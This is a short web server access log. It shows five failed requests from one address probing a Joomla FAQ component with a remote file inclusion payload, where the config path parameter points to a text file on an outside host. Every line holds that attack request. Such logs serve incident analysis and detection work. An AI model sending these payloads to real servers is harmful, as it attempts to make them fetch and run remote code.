74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /logs/access_log.Q110011800%20%20/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /logs/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /logs/access_log.Q110011800/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:28 -0500] "GET /////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
